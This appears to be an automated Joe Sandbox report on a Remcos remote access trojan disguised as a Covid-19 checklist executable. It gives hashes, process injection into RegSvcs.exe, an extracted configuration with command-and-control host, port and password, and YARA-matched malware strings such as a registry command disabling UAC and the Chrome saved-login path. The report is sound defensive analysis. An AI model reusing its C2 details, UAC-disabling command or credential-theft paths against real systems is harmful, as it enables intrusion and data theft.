Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Covid-19 Data Report Google Checklist.exe

Overview

General Information

Sample Name:Covid-19 Data Report Google Checklist.exe
Analysis ID:479063
MD5:704320b0ab5d2f24ec101cfda39589c7
SHA1:286e65e21dc0ab4199484c948527bb3d20c4039b
SHA256:64c32d82c0dd8612a93831055d36ba9b2767c213b2706212545fc80b34a4d900
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AntiVM autoit script
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Contains functionality to capture and log keystrokes
Contains functionality to steal Firefox passwords or cookies
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Drops PE files with a suspicious file extension
Writes to foreign memory regions
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to simulate mouse events

Classification

Process Tree

  • System is w10x64
  • Covid-19 Data Report Google Checklist.exe (PID: 6380 cmdline: 'C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe' MD5: 704320B0AB5D2F24EC101CFDA39589C7)
    • xdhqeufpq.pif (PID: 6624 cmdline: 'C:\84086963\xdhqeufpq.pif' fqficjon.emu MD5: 957FCFF5374F7A5EE128D32C976ADAA5)
      • RegSvcs.exe (PID: 6824 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • xdhqeufpq.pif (PID: 6992 cmdline: 'C:\84086963\XDHQEU~1.PIF' c:\84086963\fqficjon.emu MD5: 957FCFF5374F7A5EE128D32C976ADAA5)
    • RegSvcs.exe (PID: 5084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "cato.fingusti.club:6609:s%qDr", "Assigned name": "NEWYEAR", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-VHEUO4", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000003.418699902.0000000001867000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000004.00000003.386707521.0000000004991000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000003.418686304.0000000004D51000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 34 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.xdhqeufpq.pif.4a112a0.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              4.3.xdhqeufpq.pif.4a112a0.1.raw.unpackRemcos_1Remcos Payloadkevoreilly
              • 0x16510:$name: Remcos
              • 0x16888:$name: Remcos
              • 0x16de0:$name: Remcos
              • 0x16e33:$name: Remcos
              • 0x15674:$time: %02i:%02i:%02i:%03i
              • 0x156fc:$time: %02i:%02i:%02i:%03i
              • 0x16be4:$time: %02i:%02i:%02i:%03i
              • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
              4.3.xdhqeufpq.pif.4a112a0.1.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x166f8:$str_a1: C:\Windows\System32\cmd.exe
              • 0x16714:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x16714:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x15dfc:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x16400:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x159e0:$str_b2: Executing file:
              • 0x16798:$str_b3: GetDirectListeningPort
              • 0x16240:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x16534:$str_b5: licence_code.txt
              • 0x1649c:$str_b6: \restart.vbs
              • 0x163c0:$str_b8: \uninstall.vbs
              • 0x1596c:$str_b9: Downloaded file:
              • 0x15998:$str_b10: Downloading file:
              • 0x15690:$str_b11: KeepAlive Enabled! Timeout: %i seconds
              • 0x159fc:$str_b12: Failed to upload file:
              • 0x167d8:$str_b13: StartForward
              • 0x167bc:$str_b14: StopForward
              • 0x16330:$str_b15: fso.DeleteFile "
              • 0x16394:$str_b16: On Error Resume Next
              • 0x162fc:$str_b17: fso.DeleteFolder "
              • 0x15a14:$str_b18: Uploaded file:
              8.3.xdhqeufpq.pif.4d70a88.4.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                8.3.xdhqeufpq.pif.4d70a88.4.raw.unpackRemcos_1Remcos Payloadkevoreilly
                • 0x16510:$name: Remcos
                • 0x16888:$name: Remcos
                • 0x16de0:$name: Remcos
                • 0x16e33:$name: Remcos
                • 0x15674:$time: %02i:%02i:%02i:%03i
                • 0x156fc:$time: %02i:%02i:%02i:%03i
                • 0x16be4:$time: %02i:%02i:%02i:%03i
                • 0x3074:$crypto: 0F B6 D0 8B 45 08 89 16 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 F8 FB FF FF 30 06 47 3B 7D ...
                Click to see the 37 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\84086963\xdhqeufpq.pif' fqficjon.emu, ParentImage: C:\84086963\xdhqeufpq.pif, ParentProcessId: 6624, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6824
                Sigma detected: Possible Applocker BypassShow sources
                Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\84086963\xdhqeufpq.pif' fqficjon.emu, ParentImage: C:\84086963\xdhqeufpq.pif, ParentProcessId: 6624, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6824

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "cato.fingusti.club:6609:s%qDr", "Assigned name": "NEWYEAR", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-VHEUO4", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}
                Multi AV Scanner detection for submitted fileShow sources
                Source: Covid-19 Data Report Google Checklist.exeVirustotal: Detection: 48%Perma Link
                Source: Covid-19 Data Report Google Checklist.exeReversingLabs: Detection: 57%
                Yara detected Remcos RATShow sources
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000003.418699902.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386707521.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388209243.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.614438289.0000000003630000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418686304.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421704593.0000000004D51000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386521048.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388439070.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388390294.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421834849.0000000001867000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421773839.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418832919.0000000004D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421808057.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421744141.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388650467.00000000048A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418729526.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388336916.00000000049D0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.418713297.0000000004D31000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.417154110.0000000004D11000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386874226.00000000049F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421731075.000000000188B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388305317.0000000004991000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.388273489.00000000048C8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386594878.00000000049B1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422168272.0000000002FA0000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000003.421790934.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386755735.0000000004971000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.386645318.00000000048A9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6624, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6824, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: xdhqeufpq.pif PID: 6992, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5084, type: MEMORYSTR
                Multi AV Scanner detection for domain / URLShow sources
                Source: cato.fingusti.clubVirustotal: Detection: 6%Perma Link
                Source: cato.fingusti.clubVirustotal: Detection: 6%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\84086963\xdhqeufpq.pifVirustotal: Detection: 54%Perma Link
                Source: C:\84086963\xdhqeufpq.pifMetadefender: Detection: 28%Perma Link
                Source: C:\84086963\xdhqeufpq.pifReversingLabs: Detection: 50%
                Source: 4.3.xdhqeufpq.pif.49d0a88.4.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 8.3.xdhqeufpq.pif.4d70a88.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 8.3.xdhqeufpq.pif.4d30a78.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 4.3.xdhqeufpq.pif.49d0a88.2.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 6.2.RegSvcs.exe.13b0000.0.unpackAvira: Label: BDS/Backdoor.Gen
                Source: 12.2.RegSvcs.exe.b00000.0.unpackAvira: Label: BDS/Backdoor.Gen
                Source: 8.3.xdhqeufpq.pif.4d70a88.3.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 4.3.xdhqeufpq.pif.4a112a0.1.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 8.3.xdhqeufpq.pif.4d70a88.4.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 4.3.xdhqeufpq.pif.49d0a88.3.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 8.3.xdhqeufpq.pif.4db0a98.1.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 4.3.xdhqeufpq.pif.4990a78.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Covid-19 Data Report Google Checklist.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B3C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha6_2_013B3C4A
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00C3A2DF
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C59FD3 FindFirstFileExA,0_2_00C59FD3
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00C4AFB9
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0132399B GetFileAttributesW,FindFirstFileW,FindClose,4_2_0132399B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013B751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,6_2_013B751B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C0586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,D3DKMTWaitForSynchronizationObjectFromGpu,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q